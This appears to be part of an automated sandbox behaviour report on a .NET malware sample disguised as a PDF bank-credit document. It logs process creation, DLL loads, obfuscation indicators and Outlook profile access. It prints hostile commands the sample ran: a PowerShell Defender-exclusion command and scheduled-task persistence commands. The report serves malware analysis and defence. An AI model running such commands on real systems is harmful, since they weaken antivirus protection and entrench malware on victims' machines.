                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeProcess created: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe "C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeProcess created: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: BEPZA MT103 Credit.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: BEPZA MT103 Credit.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, dTuvtD1DdyQbwj9dR3.cs.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs.Net Code: xPrfnvSRvd System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs.Net Code: xPrfnvSRvd System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
                    Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_077B6640 pushfd ; retf 0_2_077B6649
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_077B58F3 push eax; ret 0_2_077B5979
                    Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exeCode function: 0_2_07C55F48 pushfd ; iretd 0_2_07C55F51
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_07486640 pushfd ; retf 11_2_07486649
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_07485970 pushad ; ret 11_2_07485971
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_07485973 push eax; ret 11_2_07485979
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 11_2_07885F48 pushfd ; iretd 11_2_07885F51
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_0126B3A8 push eax; iretd 16_2_0126B445
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_0126BB37 push es; iretd 16_2_0126BB44
                    Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exeCode function: 16_2_06C09470 push es; ret 16_2_06C09480
                    Source: BEPZA MT103 Credit.pdf.exeStatic PE information: section name: .text entropy: 7.64808870100143
                    Source: YEGIgzyAhkvT.exe.0.drStatic PE information: section name: .text entropy: 7.64808870100143
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, P3eh8af2o4VTkSD0Y3.csHigh entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, dTuvtD1DdyQbwj9dR3.csHigh entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
                    Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, ihTFxFFnSRQetgx2gS.csHigh entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
